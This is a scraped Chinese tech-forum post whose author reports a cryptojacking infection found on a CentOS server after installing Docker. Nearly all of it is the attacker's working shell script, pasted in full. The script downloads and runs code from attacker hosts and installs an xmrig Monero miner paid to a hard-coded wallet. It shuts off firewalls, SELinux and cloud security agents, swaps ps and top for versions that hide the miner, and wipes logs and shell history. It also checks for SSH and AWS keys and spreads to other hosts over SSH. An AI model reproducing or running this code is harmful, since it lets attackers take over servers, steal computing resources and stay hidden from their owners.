相关文章推荐
追风的作业本  ·  使用層疊樣式表(CSS)設計應用程式的樣式 ...·  2 月前    · 
气宇轩昂的春卷  ·  WPF ListView关闭选择开发者社区·  1 月前    · 
逼格高的李子  ·  Customize focused ...·  1 周前    · 
无邪的蚂蚁  ·  HTML5 面试选题-CSDN博客·  1 年前    · 
睿智的葫芦  ·  ASP.NET Core 中的标记帮助程序 ...·  1 年前    · 
火星上的金针菇  ·  How to show tooltip ...·  1 年前    · 
谦和的移动电源  ·  Linux图形界面开发—monodevelo ...·  2 年前    · 
Code  ›  centos 安装 docker 后发现被入侵挖矿脚本
docker centos linux脚本 background
https://cloud.tencent.com/developer/article/1828407
老实的火腿肠
2 年前
备案 控制台
学习
实践
活动
专区
工具
TVP
文章/答案/技术大牛
写文章
专栏首页 linux 自动化运维 centos 安装 docker 后发现被入侵挖矿脚本
3 0

海报分享

原创

centos 安装 docker 后发现被入侵挖矿脚本

修改于2021-05-26 14:38:57 阅读 3.1K 0 
# 通过 cat /etc/crontab   查看到挖矿脚本
#!/bin/bash
us=$(id)
curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null
ulimit -n 65535
export MOHOME=/usr/share
mkdir $MOHOME -p
if [ -f "$MOHOME/[crypto].log" ]
    echo "process possible running"
    current=$(date +%s)
    last_modified=$(stat -c "%Y" $MOHOME/[crypto].log)
   if [ $(($current-$last_modified)) -gt 600 ]; then
        echo "no miner process running";
    echo "miner process running"
    exit 1
    echo "miner process not running"
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
if ps aux | grep -i '[a]liyun'; then
  curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
  curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
MOxmrigMOD=http://85.214.149.236:443/sugarcrm/themes/default/images/mod.jpg
MOxmrigSTOCK=http://85.214.149.236:443/sugarcrm/themes/default/images/stock.jpg
miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg
config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg
config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg
WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.crondk3
VERSION=2.9
function FixTheSystem(){
echo "begin FixTheSystem"
tntrecht -i /bin/chmod || chattr -i /bin/chmod
setfacl -m u::x /bin/chmod
tntrecht -i /bin/chattr || chattr -i /bin/chattr
chmod +x /bin/chattr || setfacl -m u::x /bin/chattr
SYSFILEARRAY=(/usr/bin/apt  /usr/bin/apt-get /bin/yum  /bin/kill /usr/lib/klibc/bin/kill /usr/bin/pkill /bin/pkill /sbin/shutdown /sbin/reboot /sbin/poweroff /sbin/telinit)
for SYSFILEBIN in ${SYSFILEARRAY[@]}; do
tntrecht -i $SYSFILEBIN 
chattr -i $SYSFILEBIN 
setfacl -m u::x /bin/chmod 
setfacl -m u::x $SYSFILEBIN
chmod +x $SYSFILEBIN 
chattr +i $SYSFILEBIN 
tntrecht +i $SYSFILEBIN 
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht -iR $SYSTEMFILE  2>/dev/null 1>/dev/null
chattr -iR $SYSTEMFILE  2>/dev/null 1>/dev/null
setfacl -m u::x /bin/chmod
kill_miner_proc()
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
pkill -f 121.42.151.137
pkill -f init12.cfg
pkill -f nginxk
pkill -f
chattr -iau /tmp/lok
chmod +700 /tmp/lok
rm -rf /tmp/lok
sleep 1
chattr -i /tmp/kdevtmpfsi
echo 1 > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi
sleep 1
chattr -i /tmp/redis2
echo 1 > /tmp/redis2
chattr +i /tmp/redis2
chattr -ia /.Xll/xr
>/.Xll/xr
chattr +ia /.Xll/xr
chattr -ia /etc/trace
>/etc/trace
chattr +ia /etc/trace
chattr -ia /etc/newsvc.sh
chattr -ia /etc/svc*
chattr -ia /tmp/newsvc.sh
chattr -ia /tmp/svc*
>/etc/newsvc.sh
>/etc/svcupdate
>/etc/svcguard
>/etc/svcworkmanager
>/etc/svcupdates
>/tmp/newsvc.sh
>/tmp/svcupdate
>/tmp/svcguard
>/tmp/svcworkmanager
>/tmp/svcupdates
chattr +ia /etc/newsvc.sh
chattr +ia /etc/svc*
chattr +ia /tmp/newsvc.sh
chattr +ia /tmp/svc*
sleep 1
chattr -ia /etc/phpupdate
chattr -ia /etc/phpguard
chattr -ia /etc/networkmanager
chattr -ia /etc/newdat.sh
>/etc/phpupdate
>/etc/phpguard
>/etc/networkmanager
>/etc/newdat.sh
chattr +ia /etc/phpupdate
chattr +ia /etc/phpguard
chattr +ia /etc/networkmanager
chattr +ia /etc/newdat.sh
chattr -ia /etc/zzh
chattr -ia /etc/newinit
>/etc/zzh
>/etc/newinit
chattr +ia /etc/zzh
chattr +ia /etc/newinit
sleep 1
chattr -i /usr/lib/systemd/systemd-update-daily
echo 1 > /usr/lib/systemd/systemd-update-daily
chattr +i /usr/lib/systemd/systemd-update-daily
#yum install -y docker.io || apt-get install docker.io;
docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %
docker rm -f dockgeddon
#echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
kill_miner_proc
kill_sus_proc()
    ps axf -o "pid"|while read procid
            ls -l /proc/$procid/exe | grep /tmp
            if [ $? -ne 1 ]
                    cat /proc/$procid/cmdline| grep -a -E "crypto"
                    if [ $? -ne 0 ]
                            kill -9 $procid
                            echo "don't kill"
    ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
            cat /proc/$procid/cmdline| grep -a -E "crypto"
            if [ $? -ne 0 ]
                    kill -9 $procid
                    echo "don't kill"
kill_sus_proc
#FixTheSystem
function SetupNameServers(){	
grep -q 8.8.8.8 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
grep -q 8.8.4.4 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
SetupNameServers
chattr -iR /var/spool/cron/
tntrecht -iR /var/spool/cron/
crontab -r
function clean_cron(){
chattr -R -ia /var/spool/cron
tntrecht -R -ia /var/spool/cron
chattr -ia /etc/crontab
tntrecht -ia /etc/crontab
chattr -R -ia /etc/cron.d
tntrecht -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
tntrecht -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
clean_cron
function lock_cron()
    chattr -R +ia /var/spool/cron
    tntrecht -R +ia /var/spool/cron
    touch /etc/crontab
    chattr +ia /etc/crontab
    tntrecht +ia /etc/crontab
    chattr -R +ia /var/spool/cron/crontabs
    tntrecht -R +ia /var/spool/cron/crontabs
    chattr -R +ia /etc/cron.d
    tntrecht -R +ia /etc/cron.d
lock_cron
function CheckAboutSomeKeys(){
    if [ -f "/root/.ssh/id_rsa" ]
			echo 'found: /root/.ssh/id_rsa'
    if [ -f "/home/*/.ssh/id_rsa" ]
			echo 'found: /home/*/.ssh/id_rsa'
    if [ -f "/root/.aws/credentials" ]
			echo 'found: /root/.aws/credentials'
    if [ -f "/home/*/.aws/credentials" ]
			echo 'found: /home/*/.aws/credentials'
CheckAboutSomeKeys
if [ -f "/usr/bin/TeamTNT/[crypto]" ]
service crypto stop
rm -fr /usr/bin/TeamTNT/
function SecureTheSystem(){
echo "begin  SecureTheSystem"
    if [ -f "/bin/ps.original" ]
        echo "/bin/ps changed"
        mv /bin/ps /bin/ps.original    
        echo "#! /bin/bash">>/bin/ps
        echo "ps.original \$@ | grep -v \"crypto\|scan\"">>/bin/ps
        chmod +x /bin/ps
                touch -d 20160825 /bin/ps
        echo "/bin/ps changing"
    if [ -f "/bin/top.original" ]
        echo "/bin/top changed"
        mv /bin/top /bin/top.original  
        echo "#! /bin/bash">>/bin/top
        echo "top.original \$@ | grep -v \"crypto\|scan\"">>/bin/top
        chmod +x /bin/top
                touch -d 20160825 /bin/top
        echo "/bin/top changing"
    if [ -f "/bin/pstree.original" ]
        echo "/bin/pstree changed"
        mv /bin/pstree /bin/pstree.original
        echo "#! /bin/bash">>/bin/pstree
        echo "pstree.original \$@ | grep -v \"crypto\|scan\"">>/bin/pstree
        chmod +x /bin/pstree
                touch -d 20160825 /bin/pstree
        echo "/bin/pstree changing"
    if [ -f "/bin/chattr" ]
                chattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`
                if [ "$chattrsize" -lt "$chattr_size" ]
            yum -y remove e2fsprogs
            yum -y install e2fsprogs
                        echo "no need install chattr"
            yum -y remove e2fsprogs
            yum -y install e2fsprogs
function LockDownTheSystem(){
LOCKDOWNARRAY=(shutdown reboot poweroff telinit)
for LOCKDOWN in ${LOCKDOWNARRAY[@]}; do
LOCKDOWNBIN=`which $LOCKDOWN` 2>/dev/null 1>/dev/null
chattr -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNBIN 2>/dev/null 1>/dev/null
#chmod 000 $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
tntrecht +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
LOCKDOWNFILES=("/lib/systemd/system/reboot.target" "/lib/systemd/system/systemd-reboot.service")
for LOCKDOWNFILE in ${LOCKDOWNFILES[@]}; do
chattr -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNFILE 2>/dev/null 1>/dev/null
> $LOCKDOWNFILE
rm -f $LOCKDOWNFILE 2>/dev/null 1>/dev/null
function KILLMININGSERVICES(){
echo "[*] Removing previous miner (if any)"
if sudo -n true 2>/dev/null; then
  sudo systemctl stop crypto.service
killall -9 xmrig
echo "do KILLMININGSERVICES"
$(docker rm $(docker ps | grep -v grep | grep "/bin/bash -c 'apt" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
#$(docker rm $(docker ps | grep -v grep | grep "/bin/bash" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
rm -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
pkill -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
killall -9 docker-update  2>/dev/null 1>/dev/null
rm -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
pkill -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
killall -9 redis-backup 2>/dev/null 1>/dev/null
rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null
killall -9 xmrig 2>/dev/null 1>/dev/null
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
if [ ! -f /usr/bin/tntrecht ]; then
chattrbin=`which chattr` 
cp $chattrbin /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod +x /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod -x $chattrbin 2>/dev/null 1>/dev/null
tntrecht +i $chattrbin 2>/dev/null 1>/dev/null
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
if [ -f /root/.tmp/xmrig ]; then
chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tntrecht -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tmpxmrig=("/root/.tmp/config.json" "/root/.tmp/config_background.json" "/root/.tmp/xmrig.log" "/root/.tmp/miner.sh" "/root/.tmp/xmrig")
for tmpxmrigfile in ${tmpxmrig[@]}; do
rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $tmpxmrigfile 
chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null
chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null
tntrecht +i $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
killall $tmpxmrigfile 2>/dev/null 1>/dev/null
chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null
rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
ps ax| grep xmrig 2>/dev/null 1>/dev/null
if [ -f /usr/sbin/cpumon ]; then
cpumonxmr=("/usr/sbin/cpumon" "/usr/cpu")
for cpumonfile in ${cpumonxmr[@]}; do
chattr -i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht -i $cpumonfile 2>/dev/null 1>/dev/null
rm -f $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $cpumonfile
chmod +x $cpumonfile 2>/dev/null 1>/dev/null
chattr +i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht +i $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
killall $cpumonfile 2>/dev/null 1>/dev/null
if [ -f /opt/server ]; then
chattr -i /opt/server 2>/dev/null 1>/dev/null
tntrecht -i /opt/server 2>/dev/null 1>/dev/null
rm -f /opt/server 2>/dev/null 1>/dev/null
pkill -f /opt/server 2>/dev/null 1>/dev/null
kill $(pidof /opt/server) 2>/dev/null 1>/dev/null
if [ -f /tmp/log_rotari ]; then
chattr -i /tmp/log_rotari 2>/dev/null 1>/dev/null
tntrecht -i /tmp/log_rotari 2>/dev/null 1>/dev/null
rm -f /tmp/log_rotari 2>/dev/null 1>/dev/null
pkill -f /tmp/log_rotari 2>/dev/null 1>/dev/null
kill $(pidof /tmp/log_rotari) 2>/dev/null 1>/dev/null
BASH00=$(ps ax | grep -v grep |  grep "/root/.tmp00/bash")
if [ ! -z "$BASH00" ];
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
tntrecht -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash 2>/dev/null 1>/de 
function SetupMoneroOcean(){
function SetupMoneroOcean1(){
# printing intentions
echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; then
  echo "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz"
  exit 1
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
[ -d $MOHOME/ ] || mkdir $MOHOME/
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; then
  echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
  exit 1
rm /tmp/xmrig.tar.gz
echo "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)"
sed -i 's/"donate-level": *[^,]*,/"donate-level": 0,/' $MOHOME/[crypto].pid
$MOHOME/[crypto] --help >/dev/null
if (test $? -ne 0); then
  if [ -f $MOHOME/[crypto] ]; then
    echo "WARNING: Advanced version of $MOHOME/xmrig is not functional"
    echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
  echo "[*] Looking for the latest version of Monero miner"
  #LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest  | grep -o '".*"' | sed 's/"//g'`
  LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCK
  echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"
  if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then
    echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
    exit 1
  echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
  if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; then
    echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
  rm /tmp/xmrig.tar.gz
  echo "[*] Checking if stock version is OKAY!"
  sed -i 's/"donate-level": *[^,]*,/"donate-level": 0,/' $MOHOME/[crypto].pid
  $MOHOME/[crypto] --help >/dev/null
  if (test $? -ne 0); then 
    if [ -f $MOHOME/[crypto] ]; then
      echo "ERROR: Stock version of $MOHOME/[crypto] is not functional too"
      echo "ERROR: Stock version of $MOHOME/[crypto] was removed by antivirus too"
    exit 1
echo "[*] $MOHOME/[crypto] is OK"
if [ "$(id -u)" == "0" ]; then
  echo "running as root... its all OKAY!"
  echo "running not as root... first starting tmp setup..."
# checking prerequisites
if [ -z $WALLET ]; then
  echo "ERROR: wallet"
  exit 1
WALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 ]; then
  echo "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}"
  exit 1
if [ -z $MOHOME ]; then
  echo "ERROR: Please define HOME environment variable to your home directory"
  exit 1
if [ ! -d $MOHOME ]; then
  echo "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"
  echo '  export HOME=<dir>'
  exit 1
if ! type curl >/dev/null; then
apt-get update --fix-missing 2>/dev/null 1>/dev/null
apt-get install -y curl 2>/dev/null 1>/dev/null
apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
yum install -y curl 2>/dev/null 1>/dev/null
yum reinstall -y curl 2>/dev/null 1>/dev/null
sleep 2
$MOHOME/[crypto] --help >/dev/null
if (test $? -ne 0); then
    SetupMoneroOcean1
    echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
if [ -f "$MOHOME/[crypto].pid" ]
         echo "config file exists, neednot backup"
         echo "config file not exists.download from teamtnt"
         SetupMoneroOcean1
if [ -f "$MOHOME/[crypto]" ]
         echo "miner file exists"
         curl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig  $MOHOME/\[crypto\]
if [ -f "$MOHOME/[crypto].pid" ]
    echo "miner config exists"
    curl -L --progress-bar $config_url -o  $MOHOME/\[crypto\].pid
rm /tmp/xmrig.tar.gz
if [ -f "$MOHOME/[crypto]" ]
         echo "miner file exists, neednot backup"
         curl -L --progress-bar $miner_url_backup -o  /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[crypto\]
rm /tmp/cf.tar
sed -i 's/"url": *"[^"]*",/"url": "xmr-asia1.nanopool.org:14444",/' $MOHOME/[crypto].pid
sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $MOHOME/[crypto].pid
sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[crypto].pid
sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' $MOHOME/[crypto].pid
sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[crypto].log'",#' $MOHOME/[crypto].pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[crypto].pid
cp $MOHOME/[crypto].pid $MOHOME/config_background.json
sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json
# preparing script
echo "[*] Creating $MOHOME/[crypto].sh script"
cat >$MOHOME/[crypto].sh <<EOL
#!/bin/bash
if ! pidof [crypto] >/dev/null; then
  nice $MOHOME/[crypto] \$*
  echo "Monero miner is already running in the background. Refusing to run another one."
  echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
chmod +x $MOHOME/[crypto].sh
# preparing script background work and work under reboot
if ! sudo -n true 2>/dev/null; then
  if ! grep $MOHOME/[crypto].sh /root/.profile >/dev/null; then
    echo "[*] Adding $MOHOME/[crypto].sh script to /root/.profile"
    echo "$MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1" >>/root/.profile
    echo "Looks like $MOHOME/[crypto].sh script is already in the /root/.profile"
  echo "[*] Running crypto service in the background (see logs in $MOHOME/[crypto].log file)"
  /bin/bash $MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
  if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
    echo "[*] Enabling huge pages"
    echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
    sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
  if ! type systemctl >/dev/null; then
    /bin/bash $MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
    echo "[*] Creating crypto systemd service"
    cat >/tmp/crypto.service <<EOL
[Unit]
Description=crypto system service
[Service]
ExecStart=$MOHOME/[crypto] --config=$MOHOME/[crypto].pid
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
    sudo mv /tmp/crypto.service /etc/systemd/system/crypto.service
    echo "[*] Starting crypto systemd service"
    sudo killall [crypto] 2>/dev/null
    sudo systemctl daemon-reload
    sudo systemctl enable crypto.service
    sudo systemctl start crypto.service
localgo() {
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-  http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o-  http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
KILLMININGSERVICES
SetupMoneroOcean
makesshaxx
checksshkeys
SecureTheSystem
FixTheSystem
if [ ! -f "/var/tmp/.alsp" ]; then
localgo
echo 'lockfile' > /var/tmp/.alsp
tntrecht +i /var/tmp/.alsp || chattr +i /var/tmp/.alsp
echo "replay .. i know this server ..."
echo ""
echo "[*] Setup complete"
curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
history -c
## now the bad part of the script###

原创声明,本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

展开阅读全文
举报

 
推荐文章
追风的作业本  ·  使用層疊樣式表(CSS)設計應用程式的樣式 - .NET MAUI | Microsoft Learn
2 月前
气宇轩昂的春卷  ·  WPF ListView关闭选择开发者社区
1 月前
逼格高的李子  ·  Customize focused state appearance on tab item in Xamarin Forms app, Android implementation - Micros
1 周前
无邪的蚂蚁  ·  HTML5 面试选题-CSDN博客
1 年前
睿智的葫芦  ·  ASP.NET Core 中的标记帮助程序 | Microsoft Learn
1 年前
火星上的金针菇  ·  How to show tooltip for WPF combobox items? - CodeProject
1 年前
谦和的移动电源  ·  Linux图形界面开发—monodevelop初探 - 郭远威 - 博客园
2 年前
今天看啥   ·   Py中国   ·   codingpro   ·   小百科   ·   link之家   ·   卧龙AI搜索
删除内容请联系邮箱 2879853325@qq.com
Code - 代码工具平台
© 2024 ~ 沪ICP备11025650号